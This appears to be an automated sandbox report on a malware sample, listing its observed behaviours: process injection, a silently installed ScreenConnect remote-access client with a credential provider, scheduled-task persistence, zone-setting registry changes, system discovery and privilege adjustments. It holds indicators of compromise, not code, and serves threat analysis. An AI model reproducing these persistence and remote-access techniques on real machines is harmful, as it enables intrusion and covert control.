N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5052 set thread context of 1764 N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
PID 47720 set thread context of 47916 N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e589d25.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e589d27.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
File opened for modification C:\Windows\Installer\MSI9E2F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA17D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e589d25.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E5F.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000622eb924184734490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000622eb9240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900622eb924000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d622eb924000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000622eb92400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
